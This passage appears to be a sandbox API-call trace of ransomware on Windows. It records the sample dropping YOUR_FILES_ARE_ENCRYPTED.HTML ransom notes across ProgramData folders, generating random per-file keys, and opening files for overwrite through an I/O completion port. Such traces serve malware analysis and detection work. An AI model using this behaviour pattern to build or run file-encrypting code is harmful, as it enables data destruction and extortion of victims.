(in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x963315a8, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde3156fc, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde3156fc, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 0 [0155.254] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0155.254] wnsprintfW (in: pszDest=0x7412070, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0155.255] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0155.255] WriteFile (in: hFile=0x590, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0155.257] CloseHandle (hObject=0x590) returned 1 [0155.257] GetProcessHeap () returned 0x270000 [0155.258] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7412070 | out: hHeap=0x270000) returned 1 [0155.258] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xd8429d0a, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0x963315a8, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="1.0", cAlternateFileName="")) returned 0 [0155.258] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0155.258] wnsprintfW (in: pszDest=0x7401060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0155.258] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0155.258] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0155.260] CloseHandle (hObject=0x58c) returned 1 [0155.261] GetProcessHeap () returned 0x270000 [0155.261] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7401060 | out: hHeap=0x270000) returned 1 [0155.261] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x85f7a2c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x85f7a2c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Client", cAlternateFileName="")) returned 0 [0155.261] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0155.262] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0155.262] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\assistance\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0155.262] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0155.264] CloseHandle (hObject=0x4a8) returned 1 [0155.264] GetProcessHeap () returned 0x270000 [0155.265] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0155.265] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x96c2d3b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x96c2d3b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ClickToRun", cAlternateFileName="CLICKT~1")) returned 1 [0155.265] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun") returned 39 [0155.265] GetProcessHeap () returned 0x270000 [0155.265] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0155.265] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun" [0155.265] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\*" [0155.265] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x96c2d3b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x96c2d3b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0155.266] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x96c2d3b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x96c2d3b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.266] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e501e50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e501e50, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="5DF8E020-832F-493E-A40D-17A803C0D548", cAlternateFileName="5DF8E0~1")) returned 1 [0155.266] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548") returned 76 [0155.266] GetProcessHeap () returned 0x270000 [0155.266] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0155.266] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548" [0155.266] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\*" [0155.266] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e501e50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e501e50, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0155.266] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e501e50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e501e50, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.266] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e48fa30, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e48fa30, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-us.16", cAlternateFileName="")) returned 1 [0155.266] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16") returned 85 [0155.266] GetProcessHeap () returned 0x270000 [0155.266] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7410060 [0155.266] lstrcpyW (in: lpString1=0x7410060, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16" [0155.266] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\*" [0155.267] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e48fa30, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e48fa30, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0155.267] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e48fa30, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e48fa30, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.267] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4698d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4698d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x22d02900, ftLastWriteTime.dwHighDateTime=0x1d0d7ee, nFileSizeHigh=0x0, nFileSizeLow=0x5765, dwReserved0=0x0, dwReserved1=0x60, cFileName="MasterDescriptor.en-us.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0155.267] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\MasterDescriptor.en-us.xml") returned 112 [0155.267] lstrcmpW (lpString1="MasterDescriptor.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.267] PathFindExtensionW (pszPath="MasterDescriptor.en-us.xml") returned=".xml" [0155.267] lstrlenW (lpString=".xml") returned 4 [0155.267] PathFindExtensionW (pszPath="MasterDescriptor.en-us.xml") returned=".xml" [0155.267] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0155.267] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\en-us.16\\masterdescriptor.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0155.268] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=22373) returned 1 [0155.268] GetProcessHeap () returned 0x270000 [0155.268] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7420068 [0155.281] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="7F") returned 2 [0155.281] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="1E") returned 2 [0155.281] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="DB") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="12") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="4D") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="DB") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="8F") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="A5") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="76") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="35") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="30") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="AD") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="EE") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="55") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="A9") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="84") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="0C") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="BC") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="11") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="AA") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="9C") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="22") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="DE") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="01") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="64") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="39") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="78") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="F0") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="7A") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="C5") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="D9") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="7D") returned 2 [0155.283] lstrcpyW (in: lpString1=0x743011c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\MasterDescriptor.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\MasterDescriptor.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\MasterDescriptor.en-us.xml" [0155.283] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7420068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.283] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7420068, lpOverlapped=0x7420068) returned 1 [0155.285] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4698d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4698d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x0, dwReserved1=0x60, cFileName="s321033.hash", cAlternateFileName="S32103~1.HAS")) returned 1 [0155.285] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\s321033.hash") returned 98 [0155.286] lstrcmpW (lpString1="s321033.hash", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.286] PathFindExtensionW (pszPath="s321033.hash") returned=".hash" [0155.288] lstrlenW (lpString=".hash") returned 5 [0155.288] PathFindExtensionW (pszPath="s321033.hash") returned=".hash" [0155.288] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4698d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4698d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x21ebc700, ftLastWriteTime.dwHighDateTime=0x1d0d7ef, nFileSizeHigh=0x0, nFileSizeLow=0xd81d4, dwReserved0=0x0, dwReserved1=0x60, cFileName="stream.x86.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1 [0155.288] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\stream.x86.en-us.man.dat") returned 110 [0155.288] lstrcmpW (lpString1="stream.x86.en-us.man.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.288] PathFindExtensionW (pszPath="stream.x86.en-us.man.dat") returned=".dat" [0155.288] lstrlenW (lpString=".dat") returned 4 [0155.288] PathFindExtensionW (pszPath="stream.x86.en-us.man.dat") returned=".dat" [0155.288] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0155.288] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\stream.x86.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\en-us.16\\stream.x86.en-us.man.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0155.299] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=885204) returned 1 [0155.300] GetProcessHeap () returned 0x270000 [0155.300] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7420068 [0155.300] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="95") returned 2 [0155.300] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="A3") returned 2 [0155.300] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="B6") returned 2 [0155.300] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="3F") returned 2 [0155.300] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="80") returned 2 [0155.300] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="3A") returned 2 [0155.300] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="D7") returned 2 [0155.300] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="F8") returned 2 [0155.300] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="A4") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="EB") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="C9") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="04") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="42") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="E1") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="80") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="2A") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="C5") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="77") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="68") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="89") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="9B") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="A6") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="BE") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="A3") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="B8") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="32") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="FF") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="98") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="69") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="0A") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="AB") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="26") returned 2 [0155.302] lstrcpyW (in: lpString1=0x743011c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\stream.x86.en-us.man.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\stream.x86.en-us.man.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\stream.x86.en-us.man.dat" [0155.302] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7420068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.302] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7420068, lpOverlapped=0x7420068) returned 1 [0155.304] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4698d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4698d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x21ebc700, 